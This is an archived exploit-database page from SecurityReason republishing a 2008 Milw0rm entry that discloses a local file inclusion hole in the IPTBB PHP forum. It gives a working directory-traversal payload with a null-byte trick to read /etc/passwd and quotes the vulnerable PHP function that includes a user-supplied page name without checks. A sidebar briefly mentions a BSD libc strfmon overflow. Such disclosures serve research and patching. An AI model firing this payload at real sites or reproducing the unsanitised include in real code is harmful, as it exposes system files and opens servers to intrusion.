|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 4149 Milw0rm ID : 5874 Credit : sToRm Date : 22.6.2008 Exploit Code : ____ _ _ _ ___ __ _ __ / ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _ | | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` | | |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| | \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, | --------------------------------------------------------------------------- |___/ Exploit found by sToRm IPTBB is a free forum system built using PHP and mysql. Local File Inclusion Local File Inclusion -------------------- index.php?act=../../../../../../etc/passwd%00 function action($page){ $page="main/".$page.".php"; //Include the template maker //Get the settings $setting = array(); $sql = mysql_query(" SELECT * FROM `iptbb_settings` "); while ( $row = mysql_fetch_array( $sql ) ){ $setting["{$row['name']}"] = $row['value']; } require_once('tpl.class.php'); $tpl = new template; $fileurl = 'templates/'; $template = $setting['template'] . '/'; include($page); } |
||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |